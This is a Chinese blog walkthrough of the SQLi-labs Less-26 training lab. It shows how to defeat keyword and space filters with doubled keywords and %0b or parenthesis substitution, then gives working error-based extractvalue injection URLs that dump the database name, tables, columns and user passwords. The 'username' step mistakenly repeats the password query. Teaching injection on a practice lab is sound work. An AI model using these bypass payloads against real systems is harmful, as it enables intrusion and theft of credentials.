Sqlilabs-26

最新推荐文章于 2024-05-28 15:17:55 发布
最新推荐文章于 2024-05-28 15:17:55 发布
阅读量2.2k 收藏 2
点赞数 4
分类专栏: sqlilabs
kaka
本文链接:https://blog.csdn.net/szlg510027010/article/details/107335587
版权

来到了 Sqlilabs 大魔王的第 26 关关卡…

71859b459ba180da010ba22dd5acdf4.png

来到页面就看到大大的,“你的所有空格和过滤符都属于我们“,这难得到机智的你吗?
在此说下常见的绕过方法有:(本来这应该在 25 关卡就说的,忘了…)

  1. 双写绕过
  2. 大小写绕过
  3. 编码绕过,如:hex || URL
  4. 注释符绕过,如:/!select/
  5. 替换:如 and 可替换为 && ,or 可替换为 ||
  6. 空格的话我们可以 url 绕过:%a0 || %0b 等等,过滤字符我们可以用 and || or 替代

4ecc6ad02a297c4b37daf1791a14af4.png

有了上述的神兵利器,那就很快会被打脸的啦

http://sqlilabs/Less-26/?id=1' 回显错误

http://sqlilabs/Less-26/?id=1'%0band%0b'1'='1 回显正常 这里就用到了上述第 6 条,但是你细品构造的语句:

你会发现后台还把 and 过滤了,而且 %a0 和 %b0 根本不起作用,这就难为人家了…

3919698fa3e46af645e27950b8ef437.png

别着急,有我在,一步步来:
既然 and 被过滤,那就看看能不能双写绕过,答案是可以:
http://sqlilabs/Less-26/?id=1' aandnd '1'='1

4ff2452e4c4728f84f36c9d1fc13de5.png

and 我们处理完了,可想而知 or 应该也被过滤了,并且 --+ # 都被过滤了,前者双写可绕过,后者可以用 and 或者 or 替代,其实这个空格除了编码,还可以用 () 来绕过,比如:
查数据库名称,本来应该是:select database(),就可转换成 select(database()),结果如图:是一样的

31a21f7172c85ac2477699eccc94e3e.png
050c94f9b2f2accaedc093e57936a55.png

鉴于此题的特殊性,决定采用报错注入,结合上述的方法可以构造出如下的 payload:[这就达到了去除空格的效果]
http://sqlilabs/Less-26/?id=1'oorr(extractvalue(1,concat(0x7e,(select(database())),0x7e)))aandnd '1'='1

通过报错,得到了我们想要的数据:
720bd67dfbd7313af43a2e3dba89fb3.png

有了上面的例子,下面的 payload 构造就顺理成章啦:)

–查表:
http://sqlilabs/Less-26/?id=1'oorr(extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database())),0x7e)))aandnd'1'='1

acd9f19fea28b3592d77a6a59cf5ef4.png

–查列:
http://sqlilabs/Less-26/?id=1'oorr(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema=database())aandnd(table_name='users')),0x7e)))aandnd'1'='1

45913b8584c4edbaa15c16b256f0421.png

–查数据

–查用户名
http://sqlilabs/Less-26/?id=1'oorr(extractvalue(1,concat(0x7e,(select(group_concat(passwoorrd))from(users)),0x7e)))aandnd'1'='1

6ca794cb53e49892a1464fff0631817.png

–查密码
http://sqlilabs/Less-26/?id=1'oorr(extractvalue(1,concat(0x7e,(select(group_concat(passwoorrd))from(users)),0x7e)))aandnd'1'='1

608b472b54fd65694ec8e9b72e3382b.png

可能细心地会发现这数据不完整,没关系,加个 where(id=5) 就可以间接地让数据完整了,
最后…看了波源码:

75b80d316fac4d2d5feeb51bda8429e.png

心里一句:| 是个狼人
😄

CrAcKeR-1
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
sqli-labs26-32
willow_liang的博客
11-06 524
Less-26 代码分析 空格的绕过方法: +也可以代替空格 以下这些在windows+apache环境下解析会出问题??? %09 TAB 键(水平) %0a 新建一行 %0c 新的一页 %0d return 功能 %0b TAB 键(垂直) %a0 空格(长payload出问题)原因不知 由于不能使用注释符,可以构造一个’payload’ 1.基于布尔测试漏洞是否存在 2.使用报错注入或者时间盲注 0'+||extractvalue(1,concat(0x5c,version()))
sqli-labs26
qq_53030229的博客
06-01 926
文章目录一、审查源码1、判断注入点和闭合方式2、过滤方式二、SQL注入1、获取数据库 双写绕过:anandd 大小写绕过And ASCII编码绕过 %20、%0a绕过 内联注释:/!**/ 替换:如 and 可替换为 && ,or 可替换为 || 空格的话我们可以 url 绕过:%a0 || %0b 等等,过滤字符我们可以用 and || or 替代 一、审查源码 1、判断注入点和闭合方式 由于这个是与数据库交互的语句,通过这个判断
SQLI-labs-第二十六关和第二十六a关
最新发布
weixin_54055099的博客
05-28 753
SQLI-labs-第二十六关和第二十六a关
sqli-labs(26)
weixin_30552635的博客
05-28 522
0X01 测试闭合 单引号报错 双引号不报错 ’闭合 构造语句 过滤了空格和and ?id=1' anandd 1=1%23 ?id=1'+anandd+1=1%23 百度一下 一去看源码 真的顶不住 那我们就别光想着正确的地方输入了 我们用报错注入 ?id=1'||updatexml(1,concat(':',(select database...
SQLi LABS Less 25 联合注入+报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-28 1万+
SQLi 第二十五关,SQLi-LABS Less-25,SQLi-LABS Less 25,SQLiLABS Less25,SQLi Less 25
Sqli-labs less 26
weixin_34388207的博客
08-11 206
Less-26 TIPS:本关可能有的朋友在windows下无法使用一些特殊的字符代替空格,此处是因为apache的解析的问题,这里请更换到linux平台下。 本关结合25关,将空格,or,and,/*,#,--,/等各种符号过滤,此处对于and,or的处理方法不再赘述,参考25.此处我们需要说明两方面:对于注释和结尾字符的我们此处只能利用构造一个 ' 来闭合后面到 ' ;对于空格,有较多的...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
SQL-labs的第26关——空格和注释被过滤 报错注入(Get)
qq_73393033的博客
08-04 648
我们可以确定'号就是该网站的闭合符号。'号可能是闭合方式。
sqli-labs/Less-26
m0_71299382的博客
11-20 1389
sqli-labs第二十六关
sql-labs闯关26~31
qq_44663230的博客
09-03 2362
sql-labs闯关26-28a 29~31暂时不做
Sqlilabs Less-26-26a Trick with spaces and comments
baynk的博客
03-31 468
Sqlilabs Less-26 Trick with spaces and comments with single quote 手工注入 加quote报错,然后注释没效果,给出的提示看起来似乎是被过滤掉了,用之前手法闭合。然后发现and好像也被过滤了,继续双写试试,但是结果好像空格也被过滤了。。。用了各种编码都不行后,查了资料发现用%a0或者%0b替代(%a0好像是不间断空格,会在html显示...
SQLi Labs Lesson26 & Lesson26a
1ame的博客
08-22 570
GET - Error based - All your SPACES and COMMENTS belong to us 首先进入欢迎界面: 本节标题是 所有的空格和注释都没有卵用了。 根据上节内容,猜测应该是将空格和注释符号替换为空串。 实际测试: 构造 ?id=1 结果如图所示: 构造 ?id=1' 在$id后多添加了一个单引号导致,闭合
sqli-labs第26~28关
yuqnqi的博客
05-13 407
查看源码黑名单,过滤了 or,and , /* , – , # , 空格 , /\s 代表中的一个空白字符(可能是空格、、其他空白) 即 \s 用于匹配空白字符。我们常见的绕过空格的就是多行注释,/**/但这里过滤了,不太行啊将空格,or,and,/*,#,--,/等各种符号过滤,此处对于and,or的处理方法不再赘述,参考25.此处我们需要说明两方面:对于注释和结尾字符的我们此处只能利用构造一个 ' 来闭合后面到 ';对于空格,有较多的方法:%09 TAB键(水平)%0a 新建一行。
Sqli-labs之Less-26和Less-26a
→_→
04-22 937
Less-26 GET-基于错误-您所有的空格和注释都属于我们 待续
(手工)【sqli-labs2626a】拼接注入、过滤后注入
07-12 688
SQL-拼接、过滤后注入】
sqli-labs闯关记录(Less26-Less31)
BROTHERYY的博客
09-08 185
Advanced InjectionsLess-29 WAF PROTECTLess-30 WAF PROTECTLess-31 WAF PROTECT Less 29-31 搭建方法: 1.下载JSPstudy,安装到与PHPstudy同级目录 2.将sqli-labs目录下的tomcat-flies,解压至JSPstudy>www目录下,打开index.jsp,查看路径是否则正确 3.修改JSPstudy端口为8080,PHPstudy端口为8081 4.访问端口8080下的Less-29,
Sqlilabs-Less38-
09-23
Sqlilabs-Less38是一个关于SQL注入的实验题目。在这个实验中,你需要通过注入恶意的SQL代码来获取敏感信息或者修改数据库中的数据。 在这个具体的实验中,通过输入一个id参数,我们可以在URL中进行注入。在第一步中...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值